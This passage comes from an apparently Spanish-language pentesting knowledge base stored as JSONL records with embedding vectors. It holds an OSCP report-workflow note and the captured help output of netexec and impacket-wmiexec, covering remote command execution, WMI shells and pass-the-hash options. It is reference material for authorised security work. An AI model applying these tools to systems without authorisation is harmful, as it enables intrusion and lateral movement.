0.13223, -0.01715, -0.0005, 0.07588, 0.13764, -0.04198, 0.04921, 0.04921, -0.01709, 0.02022, 0.03779, 0.03709, -0.08192, 0.10681, 0.10788, 0.05334, 0.06573, -0.01899, 0.04811, -0.05293, 0.0477, -0.01193, 0.01226, 0.00937, -0.0205, -0.13325, -0.00167, -0.0044, 0.02116, -0.05072, -0.10729, -0.02757, 0.04569, 0.0362, 0.00804, -0.02778, -0.03127, 0.03504, 0.0561, -0.009, -0.02658, 0.00141, 0.01552, 0.00715, -0.05241, 0.01277, 0.04769, 0.006, -0.05571, -0.05811, 0.06116, 0.03912, -0.00419, 0.02343, 0.09761, 0.08288, 0.00548, -0.05066, -0.05552, 0.06312, 0.05497, 0.07424, -0.03889, 0.03992, -0.04439, 0.02317, 0.00789, -0.05978, -0.05206, 0.02233, -0.04486, -0.03344, 0.00277, -0.00416, -0.0029, -0.01483, -0.03728, -0.0333, 0.10515, -0.03036, -0.02772, 0.02819, -0.07656, -0.1007, -0.0078, -0.0911, 0.03512, -0.06982, 0.02541, -0.03513, 0.00886, 0.04659, 0.03938, 0.00934, -0.00593, 0.03012, -0.01996, 0.02186, 0.01917, 0.00401, 0.08897, 0.0162, -0.0512, 0.00945, 0.03828, -0.03367, -0.03878, 0.0111, 0.0222, -0.02609, -0.07611, 0.0371, -0.018, -0.01912, 0.05888, 0.00202, -0.02703, 0.01511, -0.04659, 0.01389, -0.01048, 0.01706, 0.06423, -0.02545, -0.096, -0.02436, 0.02665, 0.01533, -0.0425, -0.02421, 0.02067, 0.04593, 0.10768, 0.02864, -0.00218, -0.00177, 0.06268, -0.01071, 0.10404, 0.03087, -0.04609, 0.04733, -0.01699, -0.03927, 0.05319, -0.0136, -0.0349, -0.027, -0.04682, -0.05547, 0.037, 0.06212, -0.00414, -0.06473, -0.01724, -0.05675, -0.09853, 0.03993, 0.04971, -0.05813, -0.02453, 0.03252, 0.02785, -0.088, -0.00341, -0.0168]} +{"tipo": "metodologia", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "texto": "## Plantilla\n- Markdown: `noraj/OSCP-Exam-Report-Template-Markdown`\n → https://github.com/noraj/OSCP-Exam-Report-Template-Markdown", "v": [-0.13007, -0.13752, 0.06142, -0.30299, 0.02999, -0.19109, -0.06379, 0.13501, 0.03361, 0.19219, -0.00296, -0.17202, 0.09286, 0.02443, 0.00153, 0.03935, -0.02312, 0.01091, -0.0399, -0.0341, -0.04609, -0.02784, -0.06377, 0.01618, 0.08678, 0.12778, -0.12569, 0.01495, -0.02088, -0.1287, 0.02631, -0.04216, -0.08134, -0.03922, -0.03748, -0.02509, 0.08158, -0.12027, 0.00374, 0.12864, -0.08068, -0.01677, -0.08701, 0.01137, 0.09898, -0.01506, 0.15535, 0.02922, -0.05342, -0.04343, -0.04014, -0.09019, -0.13634, 0.06473, -0.01325, 0.08876, 0.05702, -0.01508, 0.06603, -0.01015, 0.00549, 0.0237, -0.05827, -0.19269, 0.08494, -0.01636, 0.00492, 0.03415, 0.02012, 0.14005, 0.06697, 0.06579, 0.05567, -0.12373, -0.00392, -0.04848, 0.08308, -0.06626, 0.00856, 0.11413, -0.07207, -0.02566, -0.03441, 0.09494, -0.10054, -0.02739, 0.05542, 0.06715, -0.13571, -0.07809, 0.009, -0.01219, 0.03929, 0.05989, 0.02198, -0.06496, -0.02781, -0.01695, -0.00215, -0.10049, -0.05314, -0.02485, 0.04844, -0.01961, -0.04487, 0.05771, 0.08112, -0.05676, -0.01355, 0.07689, 0.06929, 0.07057, 0.0393, 0.10794, -0.08111, -0.01498, -0.02458, 0.08728, -0.00836, 0.05352, -0.01806, 0.06466, -0.05045, 0.05353, -0.06784, 0.07473, 0.0797, 0.04292, 0.01955, -0.01947, 0.02236, 0.02547, -0.0503, 0.02857, -0.04849, -0.00333, 0.00078, -0.0596, -0.03456, -0.06325, -0.02593, -0.02821, 0.08829, 0.09455, -0.0062, -0.05175, -0.0559, 0.00074, -0.03838, 0.04693, 0.00874, 0.00591, -0.01232, -0.05568, 0.00187, -0.05976, -0.01226, -0.00385, 0.00177, -0.00556, -0.04319, -0.02931, -0.0051, 0.01044, -0.0053, 0.02935, 0.1088, 0.03293, -0.01211, -0.00306, 0.06495, -0.0053, -0.00334, -0.0827, 0.06622, -0.07151, 0.07697, -0.05646, -0.0246, -0.01967, 0.03796, -0.02885, 0.01242, 0.01772, 0.00415, -0.02399, 0.0206, 0.02733, 0.03959, 0.01647, -0.04071, 0.02398, 0.012, -0.03706, 0.05695, 0.01766, 0.02652, -0.00728, -0.003, 0.01393, -0.07378, -0.01214, 0.00596, -0.03966, 0.06541, -0.04011, 0.03436, 0.05219, 0.02224, 0.00281, -0.02663, -0.04143, -0.05724, -0.03668, 0.01094, 0.03801, -0.03105, 0.0532, 0.00543, -0.03677, -0.03271, 0.0015, 0.03502, 0.02097, -0.04869, 0.02162, 0.00474, -0.05525, -0.05995, -0.04197, 0.04973, -0.00972, 0.0467, -0.00107, 0.00244, -0.02221, -0.0877, 0.02145, -0.01436, -0.01519, -0.02714, -0.01137, 0.05477, 0.00314, -0.12798, 0.02354, 0.00431, -0.07596, 0.0236, -0.01879, -0.0016, -0.02761, -0.01003, -0.05898, -0.06827, 0.01298]} +{"tipo": "metodologia", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "tema": "metodologia", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "texto": "## Flujo recomendado\n1. Documenta **antes** de pasar a la siguiente máquina (Metodología OSCP).\n2. Una carpeta por host con capturas + comandos.\n3. Al acabar, montas el reporte sobre esas notas.\n\nRelacionado: Estructura del examen · Gestión del tiempo · Recursos públicos · OSCP MOC", "v": [0.02844, -0.01904, -0.03014, -0.31957, -0.04865, -0.13526, 0.05125, 0.11025, -0.08509, -0.03792, -0.19446, -0.07016, 0.04212, 0.04837, 0.00784, -0.01526, 0.14587, 0.03555, -0.08665, -0.04475, -0.10553, -0.08706, -0.07315, 0.07105, 0.05038, 0.08387, 0.01824, -0.01322, -0.04447, -0.1082, 0.03768, 0.14363, 0.01773, -0.02609, -0.07459, 0.02572, -0.02401, -0.10129, -0.04086, 0.13938, -0.05328, 0.06715, -0.10798, 0.08057, 0.10471, -0.16805, 0.05863, 0.03459, -0.07725, -0.0265, -0.00813, -0.08281, -0.11132, 0.05248, -0.10374, -0.07022, 0.07572, 0.01732, -0.00504, 0.00622, 0.04015, 0.00749, -0.0586, -0.08617, 0.03692, -0.00708, 0.04824, -0.00775, -0.11019, 0.08295, -0.028, 0.07187, 0.01421, -0.0031, 0.06574, -0.1129, 0.01365, -0.00614, 0.11151, 0.05938, -0.1062, -0.11425, -0.06468, 0.06158, -0.0671, -0.05845, 0.0294, -0.12086, -0.06532, -0.05908, 0.06164, -0.02055, 0.02256, -0.02953, 0.1237, -0.09017, 0.02946, 0.04434, 0.07152, 0.00127, -0.00713, 0.05832, -0.02024, 0.10522, -0.04706, 0.07859, 0.08422, -0.08599, 0.01569, 0.02343, 0.0065, 0.04947, -0.01221, 0.09326, -0.10462, -0.10849, 0.06459, -0.02461, -0.03893, -0.01463, -0.04224, 0.01515, -0.01787, -0.01486, 0.00333, -0.0233, 0.04816, 0.06783, 0.12046, 0.01387, -0.00082, 0.05192, -0.05334, 0.03352, 0.00458, 0.00202, 0.0138, 0.00967, -0.03418, -0.1402, -0.00113, 0.07263, 0.027, -0.00554, 0.03892, 0.02954, 0.06072, -0.11733, -0.09073, 0.01197, 0.08793, -0.03448, -0.04519, -0.0164, -0.0036, -0.00035, -0.00427, -0.01447, -0.11566, 0.01405, 0.0164, -0.04296, 0.02736, 0.02742, 0.01027, 0.04306, 0.00986, 0.0205, -0.03808, -0.04134, 0.03748, -0.03537, -0.08224, -0.03892, 0.00434, -0.13537, 0.08916, -0.07489, -0.0192, -0.00756, -0.03235, 0.02604, -0.01057, 0.03985, 0.00891, -0.01667, -0.01577, -0.01294, 0.02969, -0.00099, 0.0534, -0.03538, -0.01697, 0.01504, 0.04307, -0.09038, 0.04468, -0.03756, 0.02246, 0.0011, -0.10461, -0.03212, -0.05448, -0.05236, -0.00272, 0.02053, -0.0437, 0.06736, -0.01104, 0.02835, -0.00902, 0.00848, 0.03066, -0.03702, 0.00422, -0.00192, 0.002, 0.06986, -0.05185, 0.01012, 0.05485, 0.06704, 0.04652, 0.02518, 0.05574, -0.00878, 0.04597, -0.01401, 0.0516, -0.01535, -0.03134, 0.00879, 0.03764, -0.01547, 0.01079, 0.00247, 0.01439, -0.03311, 0.00454, -0.11802, 0.01056, 0.03068, -0.01143, -0.06098, -0.0649, -0.00536, -0.03298, -0.04345, 0.01724, -0.08466, 0.00342, -0.01773, 8e-05, -0.05664, -0.00883, -0.0234]} +{"tipo": "metodologia", "herramienta": "netexec", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/netexec.md", "texto": "# netexec — manual\n\nSalida de `netexec --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nusage: netexec [-h] [--version] [-t THREADS] [--timeout TIMEOUT]\n [--jitter INTERVAL] [--no-progress] [--log LOG]\n [--verbose | --debug] [-6] [--dns-server DNS_SERVER]\n [--dns-tcp] [--dns-timeout DNS_TIMEOUT]\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp} ...\n\n . .\n .| |. _ _ _ _____\n || || | \\ | | ___ | |_ | ____| __ __ ___ ___\n \\\\( )// | \\| | / _ \\ | __| | _| \\ \\/ / / _ \\ / __|\n .=[ ]=. | |\\ | | __/ | |_ | |___ > < | __/ | (__\n / /˙-˙\\ \\ |_| \\_| \\___| \\__| |_____| /_/\\_\\ \\___| \\___|\n ˙ \\ / ˙\n ˙ ˙\n\n The network execution tool\n Maintained as an open source project by @NeffIsBack, @MJHallenbeck, @_zblurx\n\n For documentation and usage examples, visit: https://www.netexec.wiki/\n\n Version : 1.5.1\n Codename: Yippie-Ki-Yay\n Commit : 515dccee", "v": [0.12232, -0.0718, 0.02963, -0.02472, 0.14563, -0.13437, -0.17286, 0.00412, 0.0978, 0.15522, -0.12038, -0.17348, 0.03434, -0.13824, -0.15837, 0.01169, -0.00909, -0.04521, -0.00027, 0.01616, -0.04046, 0.0269, -0.18779, -0.01499, 0.05256, 0.03108, -0.06561, 0.05175, -0.18923, 0.00323, -0.02105, -0.12425, -0.09256, -0.01346, -0.0528, 0.01349, -0.00246, 0.04347, 0.0045, 0.17881, -0.07272, 0.04301, -0.0746, 0.16222, 0.03228, -0.09723, 0.03912, -0.02337, 0.02541, -0.13501, -0.01136, -0.07918, -0.08839, 0.05217, -0.04863, 0.01687, 0.17701, -0.03005, -0.0118, 0.02124, -0.01916, -0.01471, -0.08544, -0.11642, 0.08437, 0.00675, 0.05657, -0.11823, -0.08391, 0.11645, -0.06986, -0.0185, 0.02506, -0.1261, 0.01736, -0.14488, 0.09144, -0.05883, 0.00974, 0.07145, -0.11336, -0.08372, -0.06515, -0.03833, -0.00926, -0.04473, 0.0514, -0.03468, -0.02023, -0.0968, 0.01567, 0.0274, 0.04905, 0.02077, 0.02517, -0.11712, -0.02799, 0.01702, 0.02265, -0.07829, 0.03209, 0.07627, -0.06495, 0.04979, 0.06278, -0.04697, 0.0632, 0.03543, -0.03434, 0.03237, 0.14857, 0.00967, 0.13058, -0.05356, -0.01712, 0.01877, -0.07732, 0.10379, 0.03017, -0.01986, 0.04553, -0.08571, -0.02455, -0.03192, -0.01554, -0.03439, 0.03069, -0.00126, -0.02881, -0.05834, -0.00325, -0.02844, 0.00062, -0.02821, 0.0016, 0.07107, 0.06907, -0.00246, 0.02267, -0.05303, 0.00016, 0.01527, 0.01325, 0.12156, 0.07397, 0.06465, 0.03178, -0.09959, -0.06774, -0.01358, 0.02752, -0.01544, -0.06605, -0.01494, 0.00053, -0.05957, 0.02398, 0.02298, -0.08254, 0.00287, 0.00301, 0.07969, 0.02146, 0.0722, -0.04846, -0.04003, 0.04855, 0.01901, -0.0295, -0.03232, 0.06029, -0.01722, 0.00811, -0.04226, 0.0252, -0.0492, 0.02038, -0.02899, 0.01488, -0.0783, 0.06939, -0.07974, 0.08723, 0.01425, -0.03068, -0.02693, -0.02142, -0.03342, -0.02473, -0.01748, 0.00201, 0.00156, -0.00207, 0.03259, -0.02079, 0.03729, 0.01265, -0.05085, -0.00544, -0.02747, -0.05972, -0.01243, 0.05265, -0.02451, -0.00389, -0.02518, 0.02404, 0.03669, -0.00696, -0.04249, 0.0421, -0.00038, -0.00016, -0.01949, -0.05762, -0.00863, -0.04803, 0.01267, -0.00194, -0.03342, -0.07659, 0.06377, 0.03699, 0.00649, -0.00647, 0.0487, 0.02382, -0.02399, 0.01432, -0.07034, -0.0366, -0.05921, 0.02726, 0.01074, 0.01633, -0.05564, -0.04687, -0.00278, 0.00279, -0.02165, -0.03671, 0.00035, -0.01153, -0.03661, -0.01335, -0.05159, -0.05257, -0.03675, -0.02138, -0.01098, -0.03393, -0.03575, -0.04677, -0.08418, -0.04018, 0.00279]} +{"tipo": "metodologia", "herramienta": "netexec", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/netexec.md", "texto": "options:\n -h, --help show this help message and exit\n --verbose enable verbose output\n --debug enable debug level information\n\nGeneric Options:\n --version Display nxc version\n -t THREADS, --threads THREADS\n set how many concurrent threads to use\n --timeout TIMEOUT max timeout in seconds of each thread\n --jitter INTERVAL sets a random delay between each authentication\n\nOutput Options:\n --no-progress do not displaying progress bar during scan\n --log LOG export result into a custom file\n\nDNS:\n -6 Enable force IPv6\n --dns-server DNS_SERVER\n Specify DNS server (default: Use hosts file & System DNS)\n --dns-tcp Use TCP instead of UDP for DNS queries\n --dns-timeout DNS_TIMEOUT\n DNS query timeout in seconds", "v": [-0.02666, -0.01473, -0.14027, -0.25815, 0.02772, -0.03213, -0.15388, -0.00462, 0.03974, 0.18716, -0.0676, -0.19538, -0.10566, -0.20482, -0.13897, -0.06637, 0.05165, -0.0276, 0.12788, -0.04878, -0.115, -0.04194, -0.11597, -0.00547, 0.11485, 0.01995, -0.16142, -0.03364, -0.17899, 0.00166, -0.03004, -0.12905, -0.0235, 0.01558, -0.08735, -0.02646, -0.03966, 0.11504, 0.06901, 0.06312, 0.01301, 0.08081, -0.10672, 0.04717, 0.07142, -0.08062, 0.00913, -0.00157, 0.0647, -0.17872, -0.09273, 0.00253, -0.09538, 0.02562, -0.04323, 0.01724, 0.14702, -0.10797, -0.02508, -0.07046, -0.11722, -0.08063, -0.02935, -0.12725, 0.06437, -0.06749, 0.01179, -0.044, -0.08737, 0.07409, -0.06998, 0.04971, 0.07273, -0.09221, 0.04713, -0.05846, 0.03213, -0.03499, 0.09933, 0.09992, 0.00632, -0.06237, -0.05217, 0.04277, -0.09177, -0.08143, -0.03616, -0.04753, -0.03876, -0.0791, 0.07566, 0.04045, 0.0193, 0.0376, 0.0893, -0.05912, 0.03999, -0.01854, -0.04118, -0.05844, 0.02029, 0.1249, -0.09969, 0.10156, 0.00323, -0.01826, 0.11146, 0.00436, -0.00063, 0.03211, 0.05763, 0.05101, -0.05344, -0.09755, 0.00206, -0.00266, 0.01822, 0.01565, -0.02164, 0.02688, -0.04735, -0.10105, -0.0074, -0.011, 0.01636, -0.00259, 0.01296, -0.0407, 0.01684, -0.03605, 0.02864, -0.03188, -0.06591, -0.04252, -0.02349, 0.0848, 0.04676, -0.03858, 0.01742, -0.05717, -0.03476, 0.02126, -0.02113, 0.0157, 0.10695, -0.00774, -0.00939, -0.03286, -0.03023, -0.00606, 0.04562, -0.01633, -0.0191, -0.08499, -0.10203, -0.08888, -0.0101, 0.00016, -0.01863, 0.0261, 0.01316, 0.01353, 0.03616, 0.03861, -0.00576, 0.0037, -0.03713, 0.03305, 0.03524, -0.01804, 0.0105, 0.02643, 0.00039, -0.05004, -0.00859, 0.01155, -0.00628, -0.0445, -0.01314, 0.00866, 0.04693, -0.07195, 0.10326, 0.02192, -0.01003, -0.05959, 0.03194, 0.01176, -0.0049, -0.01471, 0.01493, 0.05338, -0.03855, 0.02955, -0.02691, -0.00149, -0.01166, -0.09455, -0.00174, -0.0047, -0.0138, -0.02788, 0.06352, -0.03208, -0.02659, 0.01773, 0.02902, 0.04387, -0.00551, -0.03132, 0.02664, 0.01255, 0.02087, 0.00704, -0.03352, 0.04408, -0.01734, -0.02455, -0.01488, -0.07755, -0.04827, 0.03259, -0.01196, 0.00618, 0.0111, -0.02216, 0.04473, 0.00067, 0.03396, -0.00752, 0.00412, 0.00409, 0.00315, -0.0046, 0.02749, -0.07335, -0.02825, 0.00363, 0.01259, 0.01847, -0.0144, -0.03025, 0.00502, 0.03001, 0.02166, -0.0232, -0.0362, -0.02488, 0.01143, -0.01415, -0.02125, -0.05622, -0.03247, -0.05119, -0.02548, 0.00621]} +{"tipo": "metodologia", "herramienta": "netexec", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/netexec.md", "texto": "Available Protocols:\n {smb,ftp,ldap,mssql,winrm,nfs,ssh,wmi,vnc,rdp}\n smb own stuff using SMB\n ftp own stuff using FTP\n ldap own stuff using LDAP\n mssql own stuff using MSSQL\n winrm own stuff using WINRM\n nfs own stuff using NFS\n ssh own stuff using SSH\n wmi own stuff using WMI\n vnc own stuff using VNC\n rdp own stuff using RDP\n```", "v": [0.05591, -0.097, -0.11187, -0.16987, -0.09514, -0.09677, -0.19057, -0.18494, 0.05702, 0.09212, -0.0843, -0.05712, 0.11738, -0.16771, -0.0606, 0.04237, -0.05395, -0.20746, 0.04558, 0.06896, -0.01109, -0.01783, -0.12836, -0.08082, 0.02651, 0.02699, 0.03245, 0.01663, -0.16259, -0.04479, 0.14208, -0.04865, -0.05556, 0.04196, -0.04098, -0.04664, 0.0343, 0.0292, 0.01186, 0.1383, 0.10777, 0.08556, -0.08063, 0.07674, 0.05809, -0.12567, -0.01507, -0.10762, 0.03221, 0.05456, -0.06876, -0.01518, -0.14147, 0.01012, -0.04791, 0.00113, 0.09982, -0.16389, 0.02752, 0.1257, -0.19101, 0.01585, -0.01588, -0.14701, -0.00279, -0.05539, -0.00748, -0.02905, -0.1027, 0.05135, -0.11475, 0.00095, 0.03593, -0.04812, 0.0414, -0.0236, 0.00496, 0.04015, 0.1012, 0.05111, -0.04791, -0.18283, -0.05837, 0.06752, -0.03056, -0.05479, 0.04715, 0.02087, 0.04608, -0.04057, -0.01441, 0.02025, -0.07309, 0.00609, 0.03846, -0.12145, -0.00357, -0.03093, 0.04125, 0.02593, -0.01389, 0.01165, -0.09883, 0.05221, -0.02278, -0.01634, 0.11731, 0.02772, 0.05874, 0.02661, 0.10131, 0.08403, 0.03645, -0.02688, -0.06713, -0.05147, -0.00669, -0.0309, -0.02779, -0.01128, -0.03194, -0.12548, -0.01224, 0.01514, -0.02084, -0.03524, 0.03158, 0.08009, -0.04198, 0.05683, 0.04665, -0.06261, 0.00291, -0.05266, -0.00402, -0.00548, -0.01551, -0.0419, -0.02466, -0.0193, 0.00973, 0.02072, -0.058, 0.01138, 0.02842, -0.00753, 0.03555, -0.07245, -0.00869, -0.01762, 0.05622, -0.04718, -0.02241, -0.07796, 0.0283, -0.0091, 0.06731, -0.01003, -0.0947, 0.0334, -0.04323, 0.01722, -0.04099, 0.05198, -0.04128, 0.00953, 0.05535, -0.06344, -0.02972, -0.01018, 0.0089, 0.07153, 0.01835, -0.06131, 0.05857, -0.08018, 0.01652, 0.01453, 0.00253, -0.02397, 0.01984, -0.00728, 0.04006, 0.01914, 0.00735, -0.0661, 0.00495, 0.02313, -0.00183, -0.04645, -0.08145, 0.0036, 0.01209, 0.02517, -0.01114, -0.02813, -0.02432, -0.0714, -0.03563, -0.01435, -0.02676, 0.00031, -0.02016, -0.00871, -0.00704, -0.03192, -0.05027, 0.08398, -0.02119, -0.03138, 0.06389, 0.03537, -0.02751, -0.02105, 0.017, 0.01532, -0.03345, -0.00664, -0.01048, -0.07629, -0.01171, 0.06892, 0.03913, -0.00859, 0.02296, -0.01918, -0.04621, 0.02691, 0.00061, -0.00984, -0.02777, -0.08637, 0.02439, -0.01857, 0.06264, -0.01134, -0.02716, 0.00636, 0.04483, 0.02715, -0.00435, -0.02075, -0.01794, -0.00271, 0.00893, -0.0078, -0.05968, 0.01412, -0.04165, 0.01021, 0.01268, -0.13017, -0.01663, -0.01458, -0.08055, 0.04108]} +{"tipo": "metodologia", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "texto": "# impacket-wmiexec — manual\n\nSalida de `impacket-wmiexec -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand]\n [-debug] [-codec CODEC] [-shell-type {cmd,powershell}]\n [-com-version MAJOR_VERSION:MINOR_VERSION]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]\n [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]\n target [command ...]\n\nExecutes a semi-interactive shell using Windows Management Instrumentation.\n\npositional arguments:\n target [[domain/]username[:password]@]\n command command to execute at the target. If empty it will\n launch a semi-interactive shell", "v": [-0.09469, -0.12509, -0.14947, -0.18744, 0.09239, -0.246, -0.05467, 0.01255, -0.0234, 0.16051, -0.09881, -0.05553, -0.02598, -0.12655, 0.03107, 0.06328, 0.0433, -0.10519, -0.04907, 0.00941, 0.09316, 0.08367, -0.12799, 0.03698, -0.04374, 0.16374, -0.03991, 0.08592, -0.1719, -0.12153, 0.00928, -0.03767, -0.01111, -0.02557, -0.05427, -0.04203, -0.07282, 0.04657, -0.02087, 0.22536, -0.06891, 0.03541, -0.19409, 0.153, 0.08578, -0.06151, 0.04375, -0.00374, 0.06617, -0.09203, -0.06503, -0.03429, -0.16747, 0.028, 0.07215, 0.00708, 0.18905, -0.04957, -0.03939, -0.04332, -0.08923, 0.02264, -0.00651, -0.02195, 0.07246, 0.00485, 0.01652, -0.11613, -0.07998, 0.08707, -0.08095, -0.01024, -0.01206, 0.01477, 0.04153, -0.04336, 0.0047, -0.05799, 0.06181, 0.04099, -0.05025, -0.06893, -0.08266, -0.03516, -0.05137, -0.07466, 0.04836, -0.04218, -0.04973, -0.08633, 0.10898, -0.03966, -0.0161, 0.03296, 0.04555, -0.11997, -0.02297, 0.00579, 0.03594, -0.09323, 0.0275, 0.04189, -0.08537, 0.13463, 0.06047, 0.01065, 0.01355, -0.01202, -0.00173, 0.05414, 0.05228, -0.0515, 0.01662, -0.02262, -0.00557, -0.03463, -0.07068, -0.03385, 0.04524, -0.04016, -0.07339, -0.01728, -0.03105, 0.01574, -0.04543, -0.04626, -0.06036, 0.06778, 0.0072, -0.08339, 0.01068, -0.03788, 0.03221, -0.00468, 0.00965, 0.11298, 0.07347, -0.01851, -0.03072, -0.05832, 0.05914, 0.03161, -0.02053, 0.04834, 0.10485, 0.06509, 0.06799, -0.03174, -0.07865, 0.02509, 0.03206, 0.02424, -0.00953, 0.00146, -0.0177, -9e-05, 0.01195, 0.0117, -0.04718, 0.03092, -0.03327, -0.0082, -0.00694, 0.02719, -0.01474, -0.03623, 0.00085, -0.01722, 0.02062, -0.01496, 0.01663, 0.033, 0.00139, 0.00595, 0.0141, -0.09015, 0.01375, -0.03642, 0.01294, -0.06347, 0.01955, -0.01805, 0.0167, 0.02814, -0.00211, -0.02231, 0.01573, -0.05605, -0.01264, 0.02714, 0.02447, 0.03982, -0.0587, -0.00778, 0.00968, -0.01653, -0.0154, -0.03184, 0.0062, -0.00981, -0.04655, 0.02263, -0.01415, -0.04198, 0.051, -0.00127, -0.05335, 0.03508, -0.04453, -0.00333, 0.03149, -0.00625, 0.03563, -0.01431, -0.0393, -0.01482, 0.04937, 0.0169, -0.03358, -0.01709, -0.02504, 0.08796, 0.09097, -0.01642, 0.00133, 0.01632, 0.02341, 0.00615, 0.08702, -0.02162, -0.05629, 0.04582, -0.00719, -0.06586, 0.0414, -0.00468, -0.00527, -0.01219, -0.0381, -0.05454, 0.0168, 0.03448, -0.00083, -0.07901, -0.068, -0.07383, -0.06832, 0.02002, 0.00183, -0.02274, -0.04974, -0.01225, 0.00125, -0.06737, -0.0126, -0.02621]} +{"tipo": "metodologia", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "texto": "options:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n ADMIN$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n -ts Adds timestamp to every logging output\n -silentcommand does not execute cmd.exe to run given command (no\n output)\n -debug Turn DEBUG output ON\n -codec CODEC Sets encoding used (codec) from the target's output\n (default \"utf-8\"). If errors are detected, run\n chcp.com at the target, map the result with https://do\n cs.python.org/3/library/codecs.html#standard-encodings\n and then execute wmiexec.py again with -codec and the\n corresponding codec\n -shell-type {cmd,powershell}\n choose a command processor for the semi-interactive\n shell\n -com-version MAJOR_VERSION:MINOR_VERSION\n DCOM version, format is MAJOR_VERSION:MINOR_VERSION\n e.g. 5.7", "v": [0.1101, -0.07824, -0.20092, -0.14479, 0.01279, -0.21206, -0.03425, 0.07684, 0.0106, -0.02601, -0.14522, -0.11286, -0.00334, -0.15298, -0.02576, 0.01508, -0.01073, -0.12461, 0.00187, 0.01657, 0.07752, -0.03102, -0.01086, -0.06126, 0.12983, 0.19957, -0.07962, 0.02587, -0.13497, -0.11644, 0.01247, 0.02792, 0.04679, 0.01156, -0.10763, -0.01442, -0.00677, 0.00097, -0.07601, 0.27447, -0.11651, 0.05021, -0.12427, 0.07962, 0.09064, -0.15054, 0.06716, 0.05999, 0.10226, -0.06908, -0.03221, 0.01594, -0.13993, 0.03989, 0.02309, -0.02143, 0.0583, -0.047, -0.05506, -0.07941, -0.05647, 0.00218, -0.00369, -0.12469, 0.06647, 0.12323, 0.00247, -0.05276, -0.05023, 0.06318, -0.13412, 0.05052, -0.04164, -0.0202, 0.04549, -0.08768, -0.14529, -0.10825, 0.11767, 0.02488, -0.00066, -0.02189, 0.03773, -0.00929, -0.02376, -0.04921, -0.01918, -0.06236, -0.04849, -0.10949, 0.08832, -0.01276, 0.00997, 0.02169, 0.01314, -0.17456, 0.02647, -0.01056, 0.05198, -0.02592, 0.03122, 0.01716, -0.04834, 0.13242, 0.1003, 0.00587, 0.05671, -0.00362, -0.0332, 0.05822, 0.07286, 0.00404, 0.00393, -0.03857, -0.04465, -0.06651, -0.02363, -0.01464, -0.01772, -0.00557, -0.06072, -0.0203, -0.04919, -0.02054, -0.01187, 0.01081, -0.03145, 0.06707, -0.01873, 0.02568, -0.00685, -0.07311, 0.00573, -0.06915, -0.01997, 0.06102, 0.081, 0.0054, -0.02793, -0.04882, 0.05231, 0.03024, -0.04162, 0.09821, 0.11101, 0.03671, -0.00955, -0.01446, -0.06105, -0.02474, 0.0344, 0.02166, -0.05785, -0.07483, -0.05751, -0.03593, 0.03585, -0.0019, -0.06115, -0.0052, 0.00303, -0.00469, -0.03276, 0.0055, -0.03931, -0.04849, 0.00844, -0.01868, 0.02046, -0.00295, -0.04279, 0.02687, 0.00539, -0.09996, -0.00977, -0.0795, -0.03122, -0.0851, -0.01656, -0.01918, 0.02702, 0.02185, 0.01086, 0.05039, 0.00577, -0.03735, -0.0051, -0.05405, -0.05976, -0.05824, 0.02321, 0.06824, -0.00654, -0.04063, 0.03899, -0.04212, -0.03559, -0.00512, 0.0183, 0.00573, -0.03257, 0.03824, 0.02675, -0.04662, 0.06725, 0.06216, -0.0505, 0.0385, -0.02764, 0.01205, 0.06559, 0.02184, 0.01655, 0.00339, -0.03993, 0.00996, 0.02766, 0.06074, -0.00509, -0.02419, -0.0292, 0.04705, 0.05172, -0.03459, 0.01666, 0.00901, -0.00442, 0.00535, 0.02948, -0.01899, -0.05045, 0.03213, -0.03856, -0.02766, 0.02164, -0.00768, -0.03282, -0.01065, -0.03669, -0.07276, 0.02255, 0.00249, -0.01075, -0.02466, -0.026, -0.01014, -0.00491, -0.02517, 0.01418, 0.00324, -0.02017, -0.0023, 0.02104, -0.05527, -0.01169, -0.01781]} +{"tipo": "metodologia", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "tema": "manuales", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -A authfile smbclient/mount.cifs-style authentication file. See\n smbclient man page's -A option.\n -keytab KEYTAB Read keys for SPN from keytab file\n```", "v": [-0.05796, -0.13365, -0.05953, -0.20364, 0.08038, -0.28998, -0.10774, 0.0297, -0.13689, 0.2044, -0.0674, -0.11162, -0.03001, -0.11752, 0.02841, 0.05425, -0.02739, -0.11581, 0.03673, 0.0559, 0.05455, 0.06537, -0.15726, 0.04366, -0.04518, 0.06468, -0.00904, 0.07646, -0.15525, 0.01164, 0.04265, -0.12229, -0.03802, 0.06441, -0.04893, 0.00926, -0.06479, 0.09487, -0.00259, 0.21402, 0.03439, 0.01911, -0.06884, 